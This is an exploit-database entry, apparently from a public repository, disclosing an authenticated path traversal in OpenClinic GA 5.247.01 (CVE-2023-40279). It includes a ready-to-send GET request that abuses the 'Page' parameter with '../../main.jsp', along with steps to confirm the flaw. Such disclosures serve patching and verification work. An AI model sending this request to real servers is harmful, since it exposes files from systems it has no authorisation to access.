27ecd9e84b
5 changes to exploits/shellcodes/ghdb Jenkins 2.441 - Local File Inclusion OpenClinic GA 5.247.01 - Information Disclosure OpenClinic GA 5.247.01 - Path Traversal (Authenticated) djangorestframework-simplejwt 5.3.1 - Information Disclosure
1.6 KiB
Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated)
Date: 2023-08-14
Exploit Author: V. B.
Vendor Homepage: https://sourceforge.net/projects/open-clinic/
Software Link: https://sourceforge.net/projects/open-clinic/
Version: OpenClinic GA 5.247.01
Tested on: Windows 10, Windows 11
CVE: CVE-2023-40279
Details
An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to 'main.do'. This vulnerability allows for the retrieval and execution of files from arbitrary directories.
Proof of Concept (POC)
Steps to Reproduce:
-
Crafting the Malicious GET Request:
-
Utilize a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite.
-
Format the GET request as follows (in this example,
../../main.jspis used to attempt directory traversal to accessmain.jsp):
GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1 Host: 192.168.100.5:10088 Accept-Encoding: gzip, deflate Accept: / Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 Connection: close Cookie: JSESSIONID=[SESSION ID] Cache-Control: max-age=0
- Confirming the Vulnerability:
- Send the crafted GET request to the target server.
- If the server responds with the content of the requested file (e.g.,
main.jsp) from outside the intended directory, it confirms the presence of a directory path traversal vulnerability. - This vulnerability can lead to sensitive information disclosure or more severe attacks.